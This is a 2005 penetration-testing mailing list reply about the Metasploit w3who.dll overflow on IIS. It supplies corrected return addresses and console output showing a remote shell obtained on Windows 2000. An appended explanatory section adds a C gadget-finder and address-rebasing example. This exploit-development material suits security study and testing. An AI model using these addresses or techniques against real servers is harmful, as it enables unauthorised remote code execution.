Penetration Testing mailing list archives
Re: question regarding w3who.dll bug
From: H D Moore <sflist () digitaloffense net>
Date: Sat, 15 Jan 2005 01:56:01 -0600
The return address for Windows 2000 fails because the ImageBase for the DLL is different. I forgot to check the base address on 2000 after fixing the code to work on Windows XP SP2 :-( A new module will be posted to metasploit.com shortly. In the meantime, just change the return address in the Targets section to one of the following:

  0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
  0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
  0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])

If you run into any other bugs or reliability problems with the Metasploit Framework, *please* drop us an email at msfdev[at]metasploit.com :-)

-HD

---

  msf iis_w3who_overflow(win32_bind) > exploit
  [*] Starting Bind Handler.
  [*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
  [*] Sending 8254 bytes to remote host.
  [*] Waiting for a response...
  [*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444

  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-1999 Microsoft Corp.

  C:\WINNT\system32>

On Friday 14 January 2005 02:49, Martin Bernhard wrote:
> Hi,
>
> As one of our clients is running some IIS web servers with w3who.dll on them, I figured that this would be a good place to start our pen test. Unfortunately, the exploit in the new release of the Metasploit Framework did not work on the most important servers (Windows 2000). I have access to a test system that gives me the opportunity to analyze the bug in detail, but I can't figure out what parts in memory are overwritten. Does anybody know what exactly I have to do to trigger the bug and analyze it (I'm using ollydbg)? Any help is much appreciated.
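The point of HD's reply is that a hard-coded return address is ImageBase + RVA, so a pop/pop/ret that works when w3who.dll is based at 0x01150000 points at garbage if the DLL is based anywhere else. The following is an added example, not code from the post, the Metasploit module, or w3who.dll itself: it splits the 0x01169f4a address from the post into base and RVA, rebases it to a hypothetical alternate base (0x10000000, an assumption), and scans a constructed byte buffer (not real w3who.dll or ws2help.dll bytes, assumed mapped at RVA 0x1000) for usable pop r32; pop r32; ret sequences of the kind listed in the reply.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Single-byte x86 "pop r32" opcodes run 0x58 (eax) .. 0x5F (edi); "ret" is 0xC3. */
#define POP_BASE 0x58
#define POP_ESP  0x5C
#define OP_RET   0xC3

static const char *REG_NAMES[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };

static int is_pop(uint8_t b) { return b >= POP_BASE && b <= POP_BASE + 7; }

struct gadget {
    uint32_t rva;          /* offset from the module's ImageBase */
    uint8_t  pop1, pop2;   /* the two pop opcodes, kept for display */
};

/* Scan a code region for "pop r32; pop r32; ret". section_rva is the RVA at
 * which buf[0] is mapped. Gadgets that pop ESP are skipped: they replace the
 * stack pointer instead of discarding two dwords, so they are useless for the
 * pop/pop/ret technique. Returns the number of gadgets written to out. */
size_t find_pop_pop_ret(const uint8_t *buf, size_t len, uint32_t section_rva,
                        struct gadget *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 2 < len && n < max_out; i++) {
        if (!is_pop(buf[i]) || !is_pop(buf[i + 1]) || buf[i + 2] != OP_RET)
            continue;
        if (buf[i] == POP_ESP || buf[i + 1] == POP_ESP)
            continue;
        out[n].rva  = section_rva + (uint32_t)i;
        out[n].pop1 = buf[i];
        out[n].pop2 = buf[i + 1];
        n++;
    }
    return n;
}

/* A hard-coded return address is a VA, i.e. ImageBase + RVA. It is only valid
 * for the base the DLL was actually loaded at; the RVA is the part that
 * survives a different base, so recompute the VA from it. */
uint32_t va_to_rva(uint32_t va, uint32_t base) { return va - base; }
uint32_t rebase_va(uint32_t va, uint32_t old_base, uint32_t new_base)
{
    return new_base + (va - old_base);
}
/* True when va falls inside the module mapped at [base, base + size). */
int va_in_module(uint32_t va, uint32_t base, uint32_t size)
{
    return va >= base && va - base < size;
}

/* Constructed sample code bytes (NOT taken from w3who.dll or ws2help.dll),
 * assumed mapped at the hypothetical RVA 0x1000. */
#define SAMPLE_RVA 0x1000U
static const uint8_t SAMPLE[32] = {
    /* 0x00 */ 0x90, 0x90, 0x90, 0x90,
    /* 0x04 */ 0x58, 0x5D, 0x90, 0x90,   /* pop eax; pop ebp; nop      : no ret, rejected */
    /* 0x08 */ 0x58, 0x5D, 0xC3, 0x90,   /* pop eax; pop ebp; ret      : usable */
    /* 0x0C */ 0x5C, 0x5B, 0xC3, 0x90,   /* pop esp; pop ebx; ret      : clobbers ESP, rejected */
    /* 0x10 */ 0x5E, 0x5B, 0xC3, 0x90,   /* pop esi; pop ebx; ret      : usable */
    /* 0x14 */ 0xCC, 0xCC, 0xCC, 0xCC,
    /* 0x18 */ 0x5E, 0x5B, 0x90, 0xC3,   /* pop esi; pop ebx; nop; ret : not contiguous, rejected */
    /* 0x1C */ 0x90, 0x90, 0x90, 0x90,
};

/* Convenience wrappers over the sample so results can be checked by index. */
size_t sample_gadget_count(void)
{
    struct gadget g[8];
    return find_pop_pop_ret(SAMPLE, sizeof SAMPLE, SAMPLE_RVA, g, 8);
}
uint32_t sample_gadget_rva(size_t idx)   /* returns 0 when idx is out of range */
{
    struct gadget g[8];
    size_t n = find_pop_pop_ret(SAMPLE, sizeof SAMPLE, SAMPLE_RVA, g, 8);
    return idx < n ? g[idx].rva : 0;
}

int main(void)
{
    const uint32_t w3who_base = 0x01150000U, w3who_ret = 0x01169f4aU; /* values from the post */
    const uint32_t other_base = 0x10000000U;                          /* hypothetical load address */

    printf("w3who.dll pop/pop/ret: VA 0x%08x at base 0x%08x -> RVA 0x%05x\n",
           w3who_ret, w3who_base, va_to_rva(w3who_ret, w3who_base));
    printf("same gadget if the DLL were based at 0x%08x: 0x%08x\n",
           other_base, rebase_va(w3who_ret, w3who_base, other_base));
    printf("does the old VA even land in a module based at 0x%08x? %s\n",
           other_base, va_in_module(w3who_ret, other_base, 0x20000U) ? "yes" : "no");

    struct gadget g[8];
    size_t n = find_pop_pop_ret(SAMPLE, sizeof SAMPLE, SAMPLE_RVA, g, 8);
    printf("%zu usable pop/pop/ret gadget(s) in the constructed sample:\n", n);
    for (size_t i = 0; i < n; i++)
        printf("  RVA 0x%05x  VA 0x%08x  pop %s; pop %s; ret\n",
               g[i].rva, w3who_base + g[i].rva,
               REG_NAMES[g[i].pop1 - POP_BASE], REG_NAMES[g[i].pop2 - POP_BASE]);
    return 0;
}
```

The practical check before trusting a module's Targets entry is the one main() performs for the w3who address: confirm in the debugger what base the DLL actually loaded at on the box under test, and if it differs from the base the address was derived for, rebase the RVA rather than reuse the VA. The 0x20000 module size passed to va_in_module is an assumed figure for illustration only.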